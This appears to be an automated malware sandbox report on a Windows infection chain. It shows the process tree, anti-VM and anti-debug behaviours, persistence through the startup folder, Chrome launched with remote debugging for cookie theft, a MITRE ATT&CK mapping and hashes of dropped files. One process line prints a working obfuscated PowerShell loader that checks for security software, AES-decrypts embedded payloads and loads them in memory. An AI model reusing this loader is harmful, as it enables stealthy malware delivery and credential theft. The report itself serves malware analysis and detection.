- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5856 -
C:\Users\Admin\AppData\Local\TempRLOQOCQHVCI0USG5MEX4P5PJAZDL465A.EXE"C:\Users\Admin\AppData\Local\TempRLOQOCQHVCI0USG5MEX4P5PJAZDL465A.EXE"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:5468
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1088332001\d2YQIJa.exe"C:\Users\Admin\AppData\Local\Temp\1088332001\d2YQIJa.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:5664
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\1088333041\tYliuwV.ps1"3⤵
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- Suspicious use of AdjustPrivilegeToken
PID:5148 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat"4⤵
- System Location Discovery: System Language Discovery
PID:5876 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat';$MoqZ='DeKyLvcoKyLvmprKyLveKyLvssKyLv'.Replace('KyLv', ''),'EJwaGlemJwaGeJwaGnJwaGtJwaGAtJwaG'.Replace('JwaG', ''),'CrgSdPegSdPagSdPtgSdPegSdPDecgSdPrypgSdPtorgSdP'.Replace('gSdP', ''),'EnAUSatAUSaryAUSaPAUSaoiAUSantAUSa'.Replace('AUSa', ''),'RifKyeaifKydifKyLiifKyneifKysifKy'.Replace('ifKy', ''),'CoIpkTpyIpkTTIpkToIpkT'.Replace('IpkT', ''),'LRxQFoRxQFaRxQFdRxQF'.Replace('RxQF', ''),'ChPYPIanPYPIgPYPIePYPIExPYPItenPYPIsioPYPInPYPI'.Replace('PYPI', ''),'SplhjTaihjTathjTa'.Replace('hjTa', ''),'IVERYnvoVERYkeVERY'.Replace('VERY', ''),'MaGACXinMGACXoduGACXlGACXeGACX'.Replace('GACX', ''),'GetEffVCuEffVrreEffVnEffVtPEffVroEffVceEffVsEffVsEffV'.Replace('EffV', ''),'TrgFlMagFlMnsgFlMfogFlMrmgFlMFingFlMalgFlMBgFlMlogFlMcgFlMkgFlM'.Replace('gFlM', ''),'FZnjbroZnjbmBaZnjbseZnjb64ZnjbSZnjbtZnjbrinZnjbgZnjb'.Replace('Znjb', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($MoqZ[11])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function OcByW($zyHkO){$MahHK=[System.Security.Cryptography.Aes]::Create();$MahHK.Mode=[System.Security.Cryptography.CipherMode]::CBC;$MahHK.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$MahHK.Key=[System.Convert]::($MoqZ[13])('AAMGkknb01QKxJVl43m9//ZRwVkG6pEiu9VVo6uyG5U=');$MahHK.IV=[System.Convert]::($MoqZ[13])('/W6oLxKJHKSzHfvUm38XsQ==');$RyLXH=$MahHK.($MoqZ[2])();$Vocox=$RyLXH.($MoqZ[12])($zyHkO,0,$zyHkO.Length);$RyLXH.Dispose();$MahHK.Dispose();$Vocox;}function dAZyU($zyHkO){$CHeOb=New-Object System.IO.MemoryStream(,$zyHkO);$PxKaw=New-Object System.IO.MemoryStream;$ikNUp=New-Object System.IO.Compression.GZipStream($CHeOb,[IO.Compression.CompressionMode]::($MoqZ[0]));$ikNUp.($MoqZ[5])($PxKaw);$ikNUp.Dispose();$CHeOb.Dispose();$PxKaw.Dispose();$PxKaw.ToArray();}$ygeKx=[System.IO.File]::($MoqZ[4])([Console]::Title);$WLLeN=dAZyU (OcByW ([Convert]::($MoqZ[13])([System.Linq.Enumerable]::($MoqZ[1])($ygeKx, 5).Substring(2))));$PCQGF=dAZyU (OcByW ([Convert]::($MoqZ[13])([System.Linq.Enumerable]::($MoqZ[1])($ygeKx, 6).Substring(2))));[System.Reflection.Assembly]::($MoqZ[6])([byte[]]$PCQGF).($MoqZ[3]).($MoqZ[9])($null,$null);[System.Reflection.Assembly]::($MoqZ[6])([byte[]]$WLLeN).($MoqZ[3]).($MoqZ[9])($null,$null); "5⤵
- System Location Discovery: System Language Discovery
PID:3224
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe5⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
PID:3448 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5884
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1088334001\7aencsM.exe"C:\Users\Admin\AppData\Local\Temp\1088334001\7aencsM.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:3668 -
C:\Users\Admin\AppData\Local\Temp\1088334001\7aencsM.exe"C:\Users\Admin\AppData\Local\Temp\1088334001\7aencsM.exe"4⤵
- Executes dropped EXE
PID:5736
-
-
C:\Users\Admin\AppData\Local\Temp\1088334001\7aencsM.exe"C:\Users\Admin\AppData\Local\Temp\1088334001\7aencsM.exe"4⤵
- Executes dropped EXE
- Checks processor information in registry
PID:6076 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"5⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:5264 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffd28a5cc40,0x7ffd28a5cc4c,0x7ffd28a5cc586⤵PID:5276
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2056,i,2233476831590348623,5465262555987653613,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2052 /prefetch:26⤵PID:4380
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1932,i,2233476831590348623,5465262555987653613,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2164 /prefetch:36⤵PID:4812
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2300,i,2233476831590348623,5465262555987653613,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2480 /prefetch:86⤵PID:5204
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3204,i,2233476831590348623,5465262555987653613,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3224 /prefetch:16⤵
- Uses browser remote debugging
PID:1376
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3232,i,2233476831590348623,5465262555987653613,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3272 /prefetch:16⤵
- Uses browser remote debugging
PID:5672
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4440,i,2233476831590348623,5465262555987653613,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4276 /prefetch:16⤵
- Uses browser remote debugging
PID:3196
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4620,i,2233476831590348623,5465262555987653613,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4684 /prefetch:86⤵PID:5468
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4676,i,2233476831590348623,5465262555987653613,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4828 /prefetch:86⤵PID:2944
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4700,i,2233476831590348623,5465262555987653613,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4716 /prefetch:86⤵PID:5476
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4976,i,2233476831590348623,5465262555987653613,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4744 /prefetch:86⤵PID:516
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3668 -s 9764⤵
- Program crash
PID:5656
-
-
-
C:\Users\Admin\AppData\Local\Temp\1088335001\DTQCxXZ.exe"C:\Users\Admin\AppData\Local\Temp\1088335001\DTQCxXZ.exe"3⤵
- Executes dropped EXE
PID:5364
-
-
C:\Users\Admin\AppData\Local\Temp\1088336001\9aiiMOQ.exe"C:\Users\Admin\AppData\Local\Temp\1088336001\9aiiMOQ.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:6056 -
C:\Users\Admin\AppData\Local\Temp\1088336001\9aiiMOQ.exe"C:\Users\Admin\AppData\Local\Temp\1088336001\9aiiMOQ.exe"4⤵
- Executes dropped EXE
PID:3944
-
-
C:\Users\Admin\AppData\Local\Temp\1088336001\9aiiMOQ.exe"C:\Users\Admin\AppData\Local\Temp\1088336001\9aiiMOQ.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3380
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6056 -s 7924⤵
- Program crash
PID:5880
-
-
-
C:\Users\Admin\AppData\Local\Temp\1088338001\YMci4Rc.exe"C:\Users\Admin\AppData\Local\Temp\1088338001\YMci4Rc.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:6032 -
C:\Users\Admin\AppData\Local\Temp\1088338001\YMci4Rc.exe"C:\Users\Admin\AppData\Local\Temp\1088338001\YMci4Rc.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1592
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6032 -s 8044⤵
- Program crash
PID:1552
-
-
-
C:\Users\Admin\AppData\Local\Temp\1088339001\NL58452.exe"C:\Users\Admin\AppData\Local\Temp\1088339001\NL58452.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:4980 -
C:\Users\Admin\AppData\Local\Temp\1088339001\NL58452.exe"C:\Users\Admin\AppData\Local\Temp\1088339001\NL58452.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5720
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4980 -s 8044⤵
- Program crash
PID:6068
-
-
-
C:\Users\Admin\AppData\Local\Temp\1088340001\kdMujZh.exe"C:\Users\Admin\AppData\Local\Temp\1088340001\kdMujZh.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:5216
-
-
C:\Users\Admin\AppData\Local\Temp\1088341001\oKUl4yo.exe"C:\Users\Admin\AppData\Local\Temp\1088341001\oKUl4yo.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4528
-
-
C:\Users\Admin\AppData\Local\Temp\1088343001\Bjkm5hE.exe"C:\Users\Admin\AppData\Local\Temp\1088343001\Bjkm5hE.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:3088 -
C:\Users\Admin\AppData\Local\Temp\1088343001\Bjkm5hE.exe"C:\Users\Admin\AppData\Local\Temp\1088343001\Bjkm5hE.exe"4⤵
- Executes dropped EXE
PID:5904
-
-
C:\Users\Admin\AppData\Local\Temp\1088343001\Bjkm5hE.exe"C:\Users\Admin\AppData\Local\Temp\1088343001\Bjkm5hE.exe"4⤵
- Executes dropped EXE
PID:5880
-
-
C:\Users\Admin\AppData\Local\Temp\1088343001\Bjkm5hE.exe"C:\Users\Admin\AppData\Local\Temp\1088343001\Bjkm5hE.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6128
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3088 -s 9844⤵
- Program crash
PID:4164
-
-
-
C:\Users\Admin\AppData\Local\Temp\1088345001\76bdce9416.exe"C:\Users\Admin\AppData\Local\Temp\1088345001\76bdce9416.exe"3⤵
- System Location Discovery: System Language Discovery
PID:3204
-
-
C:\Users\Admin\AppData\Local\Temp\1088346001\bbbfd3884e.exe"C:\Users\Admin\AppData\Local\Temp\1088346001\bbbfd3884e.exe"3⤵
- System Location Discovery: System Language Discovery
PID:4164
-
-
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3660
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4312 -ip 43121⤵PID:1784
-
C:\ProgramData\fcjpwfs\ubhq.exeC:\ProgramData\fcjpwfs\ubhq.exe start21⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3488
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 1360 -ip 13601⤵PID:3756
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 1428 -ip 14281⤵PID:3660
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 4596 -ip 45961⤵PID:920
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4340 -ip 43401⤵PID:3320
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4408 -ip 44081⤵PID:3304
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3596
-
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exeC:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe1⤵
- Executes dropped EXE
PID:3844
-
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"1⤵PID:3932
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:5452
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 3668 -ip 36681⤵PID:980
-
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"1⤵PID:1372
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 6056 -ip 60561⤵PID:4008
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 6032 -ip 60321⤵PID:4760
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4980 -ip 49801⤵PID:5904
-
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"1⤵PID:3920
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 3088 -ip 30881⤵PID:5684
-
C:\ProgramData\wmcru\onrlju.exeC:\ProgramData\wmcru\onrlju.exe start21⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5236
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 3476 -ip 34761⤵PID:4460
-
C:\ProgramData\fcjpwfs\ubhq.exeC:\ProgramData\fcjpwfs\ubhq.exe start21⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3392
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5688
-
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exeC:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe1⤵PID:1492
-
C:\Users\Admin\AppData\Local\Temp\service123.exeC:\Users\Admin\AppData\Local\Temp\/service123.exe1⤵
- Loads dropped DLL
PID:1592
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
4Windows Service
4Modify Authentication Process
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
4Windows Service
4Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Impair Defenses
5Disable or Modify Tools
5Modify Authentication Process
1Modify Registry
6Virtualization/Sandbox Evasion
3Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Modify Authentication Process
1Steal Web Session Cookie
1Unsecured Credentials
5Credentials In Files
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
593KB
MD5c8fd9be83bc728cc04beffafc2907fe9
SHA195ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040
-
Filesize
782B
MD516d76e35baeb05bc069a12dce9da83f9
SHA1f419fd74265369666595c7ce7823ef75b40b2768
SHA256456b0f7b0be895af21c11af10a2f10ce0f02ead47bdf1de8117d4db4f7e4c3e7
SHA5124063efb47edf9f8b64ef68ad7a2845c31535f3679b6368f9cb402411c7918b82bd6355982821bfb3b7de860b5979b8b0355c15f4d18f85d894e2f2c8e95ef18e
-
Filesize
1.2MB
MD57a38aa3c2fbf2529b1730e704e0e2a47
SHA136bbc7042dc66f23fcd3d9753e02136b460cd732
SHA2565711af1f7ae16e458ea01760961764ddb147bf0aa86177d0e7dbd6ae786c1d5c
SHA512144e7298f55e29927f00e0c6f6a16e742b5aff437be25ea18f8ba4811b8ede8041f72a5fce5c64f37d7f69757585529aa1966da97410895dbee6a327b3478f56
-
Filesize
40B
MD5c96cc57b90192d16a3be1d7388e6764f
SHA1b87df2922b9e84abd461747b4f7e1ba1efff96c1
SHA256685d013a3a2768d25bd1342082c50ece9cf5c2c06892b23632c2b6e65d73b4b4
SHA512dbdf108cbf25db919d91988cc1d3f919ceb466bb3a39e45f4bc52437055cdfa94eac1c63cb06528d4983725ba4ba1bc95c6bf8a18f3e8211cfbe9760ad3e8c78
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\5385bb23-3389-46f4-b91b-371ac33517e7.tmp
Filesize1B
MD55058f1af8388633f609cadb75a75dc9d
SHA13a52ce780950d4d969792a2559cd519d7ee8c727
SHA256cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8
SHA5120b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
Filesize
2KB
MD525604a2821749d30ca35877a7669dff9
SHA149c624275363c7b6768452db6868f8100aa967be
SHA2567f036b1837d205690b992027eb8b81939ba0228fc296d3f30039eeba00bd4476
SHA512206d70af0b332208ace2565699f5b5da82b6a3806ffa51dd05f16ab568a887d63449da79bbaeb46183038837446a49515d62cb6615e5c5b27563cd5f774b93f5
-
Filesize
152B
MD5b70adb9c619dff10d2dcb7f926b9ec3b
SHA1ad6ab490a1527d6a056055ab5a50395c2496d4fc
SHA256ac0ff4d0e002d553021c6b0fc324efa915ce2d5ef2d1691de247e9929fa29b00
SHA512b53b6e5c13344d7e219bd27cdb9c89a6d27cbe3ac462dc8c25691cb2c92f4c42a3fe0be806c7f4f4c48d3183229948ac453cb4310f521806e38f623fdaa31165
-
Filesize
152B
MD5cf0d12cad4c4cc7c2fe1daa59995cfd4
SHA1f51a86acb90e7d9065270ed0e04b38d5bc54042f
SHA256b0fdea5fbcfa795d8165445dc5bae9837ba12c93e6a27bae8888d1585944a745
SHA512fe2c0a62cf312a651a0977b132e9ed43f9777a69a0393e7ac85b428f5f4deddb210b562247222968cc217d9fd0e21b571d00165ee0e63597d8663a7f5e5ddae7
-
Filesize
5KB
MD5d07abfac526ef6954f3b46eb9368a400
SHA104b2722f87fdc6d4a3202b4872e1910a0c7a0b4b
SHA256e95f2b1aed9c1cae0d2af3e0d1e6cae937dad9fa40ead8fb76b3826eea159550
SHA512f5fa6b48512b6c44f4437275452cfcd69f70a11975f8df37e4cf5f324d1cd7b2a180bbac4bc4e092fa8974fceda7a9d189121c331dee6c3f122b9c20b4eb86c1
-
Filesize
1B
MD5cfcd208495d565ef66e7dff9f98764da
SHA1b6589fc6ab0dc82cf12099d1c2d40ab994e8410c
SHA2565feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9
SHA51231bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99
-
Filesize
16KB
MD5dc9ee5266cd43e211be06461e9fd8302
SHA13e2fa2023c0ef42c1625cbc93bd924de71b17f14
SHA256918a49cdac7271dde469adec8aa66aed2105291ac6fcc29d2123dd98e33374ea
SHA512402863b2dd446526582ec6ddb9a3bbbd6ef3c98557d71677a199a303d930b054aa43a0e90d29b1a00a3380a8f5c13c0bb2a240861508b362f9cde2bf54c91ddc
-
Filesize
17KB
MD5b123e18b4c83c3210a1702acb3701c5d
SHA1bd974431b006edb20e8fbf1cdcd1ddb96cde3c0f
SHA256b5c9d13b65b72c4f6a2443aa2b95a0f3107d6a7922d4efecc15b0fe7a61c625d
SHA512fe183d51fab211100550f5a81c89798962a96f0f358e1ec90efa8c26a1c8bb779669d703749c44f49102649b504532dfe5142f80e8306036745ca8b002b513c4
-
Filesize
17KB
MD5b9e66b6831909ae951287faa325327cf
SHA1ee6983402daba2f4b5cfccc93a3bed9bacf3d44a
SHA256849931993353998a8849dcb61bedffcd63af085efade1d5b2ece9c91b5880d6a
SHA512817a42d4ec71a56ef1e0d0a68e7469322f83f832ae4710643ce67fb8a7b6334a2166345165f3f310ab241751b85de7bf7efe9a3f136429189dbff89b89e0a58a
-
Filesize
17KB
MD545a1f71d7e4604f75c35ad053506ab72
SHA1b809e11d947deef4678d3814501b1f2e75e1993c
SHA2569bbd4e1048c7803c58e4d17284f3174700544a8cfc82a7f619691d2488a2dbe9
SHA512b6fb0024991af58b88da5a64a838b0b36fbac14da1e1232d81f409bea5c040f3832e75ae4aaadbb55b0bc55d8407e3d12aebb04241a354eb48fe3c0759984b2f
-
Filesize
1.7MB
MD5a161fc5a3e13fa9020f47400b0a3b8ed
SHA1505d5e94545347b1a5ff0377d782e28997a298e4
SHA256a0d18890f7e05b5e4ff57114ff35e412df39d1c08462343338f1688bed3951d6
SHA512c7460c98cc6bdd7c3b3e1ee91337437541d785c0520451e2b58f075caf0d9659e88d2c156f0fb889d72f70879c84fbba104b315db96402635f21e4ea5e538dc0
-
Filesize
19.4MB
MD5f70d82388840543cad588967897e5802
SHA1cd21b0b36071397032a181d770acd811fd593e6e
SHA2561be1102a35feb821793dd317c1d61957d95475eab0a9fdc2232f3a3052623e35
SHA5123d144eee4a770b5c625e7b5216c20d3d37942a29e08560f4ebf2c36c703831fd18784cd53f3a4a2f91148ec852454ac84fc0eb7f579bb9d11690a2978eb6eef6
-
Filesize
350KB
MD5a8ead31687926172939f6c1f40b6cc31
SHA12f91f75dbdef8820146ceb6470634ab1ffb7b156
SHA25684aad76d2d1ac2179ea160565a28fc850ee125ff74c3aeb1754d20d8c9ed870c
SHA512a0082f833c6858208f04a62b03088873baac303203f758e458a1a067572ffe9785edb30dd075acbfc1431272f56a1b1be168ef29f6db0a7ee55578dc712fa387
-
Filesize
345KB
MD53987c20fe280784090e2d464dd8bb61a
SHA122427e284b6d6473bacb7bc09f155ef2f763009c
SHA256e9af37031ed124a76401405412fe2348dad28687ac8f25bf8a992299152bd6d9
SHA5125419469496f663cedcfa4acc6d13018a8ee957a43ff53f6ffa5d30483480838e4873ff64d8879996a32d93c11e727f0dded16ca04ab2e942ed5376ba29b10018
-
Filesize
348KB
MD5ce869420036665a228c86599361f0423
